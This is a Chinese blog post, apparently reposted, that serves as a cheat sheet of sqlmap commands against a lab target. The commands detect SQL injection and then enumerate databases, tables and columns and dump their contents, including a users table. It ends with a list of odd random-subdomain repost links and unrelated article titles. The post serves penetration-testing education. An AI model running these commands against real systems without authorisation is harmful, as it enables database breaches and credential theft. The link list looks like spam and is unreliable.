当前位置: 首页 > news >正文

sqlmap常用命令

@ZZHow(ZZHow1024)

一、扫描注入点

1.GET方法,给URL:

  • #探测该url是否存在漏洞
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"
  • #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
python sqlmap.py -u "http://www.xx.com/username/admin*"

2.POST方法,给抓包文件:

  • #bp.txt是我们抓取的http的请求包
python sqlmap.py -r bp.txt  
  • #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
python sqlmap.py -r bp.txt -p username  

二、爆基本信息自动化

0.查看当前的数据库

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --current-db

1.爆出所有的数据库

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --dbs

2.爆出所有的数据表

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --tables

3.爆出数据库中所有的字段

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --columns

三、爆具体信息自动化

1.爆出数据库security中的所有的表

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables

2.爆出security数据库中users表中的所有的字段

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns

爆出数据库security中的users表中的username字段中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump 

四、爆信数据自动化

1.爆出该数据库中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all

2.爆出数据库security中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all

3.爆出数据库security中的users表中的所有数据

python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all

文章转载自:

http://Pp2y8fc5.rdLfk.cn
http://dzFDdLGv.rdLfk.cn
http://mITirTRc.rdLfk.cn
http://HwD2w85D.rdLfk.cn
http://j57QHJsJ.rdLfk.cn
http://CZESk6Sn.rdLfk.cn
http://wkVzMcs7.rdLfk.cn
http://HeK0Nhvm.rdLfk.cn
http://a8Ep1JWj.rdLfk.cn
http://bmcu3VLO.rdLfk.cn
http://81sn9Hf7.rdLfk.cn
http://R5ahoKjF.rdLfk.cn
http://SSrubZIT.rdLfk.cn
http://suleZQRx.rdLfk.cn
http://bUxAXQB2.rdLfk.cn
http://4HaM2paC.rdLfk.cn
http://f800R4Vb.rdLfk.cn
http://tJOI5xvv.rdLfk.cn
http://DnnkaEZ9.rdLfk.cn
http://oaFYv4zr.rdLfk.cn
http://Y5PNeplo.rdLfk.cn
http://kIzYI5BJ.rdLfk.cn
http://W8uC18X9.rdLfk.cn
http://RH5wCNXd.rdLfk.cn
http://JcjV0v6l.rdLfk.cn
http://ivDB8T1I.rdLfk.cn
http://4zXFTCvg.rdLfk.cn
http://fe9hNe1z.rdLfk.cn
http://JBxaGglg.rdLfk.cn
http://DsPF1JUZ.rdLfk.cn
http://www.dtcms.com/a/379463.html

相关文章:

  • MID认证:全球电力计量市场的通行证与中国协议兼容性分析
  • STM32开发(USART:IIC总线)
  • Spring框架中用到的设计模式
  • 从源码和设计模式深挖AQS(AbstractQueuedSynchronizer)
  • 四、计算机网络与分布式系统(中)
  • 半导体学习笔记
  • 深入解析Dart虚拟机运行原理
  • 一文教您解决Ubuntu ModuleNotFoundError: No module named ‘_tkinter‘问题
  • 部署合约常见的问题
  • Python快速入门专业版(二十三):for循环基础:遍历字符串、列表与range()函数(计数案例)
  • MySQL 非空约束(NOT NULL):看似简单,却决定数据质量的关键细节
  • 【笔记】悬架减振器的阻尼带宽
  • C++:迭代器失效问题(vector为例)
  • TDengine 选择函数 TAIL() 用户手册
  • 在Linux系统中清理大文件的方法
  • oracle里的int类型
  • 【开关电源篇】整流及其滤波电路的工作原理和设计指南-超简单解读
  • 第五章 Logstash深入指南
  • 猫狗识别算法在智能喂食器上的应用
  • 数据库事务详解
  • Linux学习:基于环形队列的生产者消费者模型
  • size()和length()的区别
  • Windows系统下安装Dify
  • 企业云环境未授权访问漏洞 - 安全加固笔记
  • sv时钟块中default input output以及@(cb)用法总结
  • 广谱破局!芦康沙妥珠单抗覆罕见突变,一解“少数派”的用药困境
  • Guli Mall 25/08/12(高级上部分)
  • 彩笔运维勇闯机器学习--随机森林
  • Python 面向对象实战:私有属性与公有属性的最佳实践——用线段类举例
  • 使用deboor法计算三次B样条曲线在参数为u处的位置的方法介绍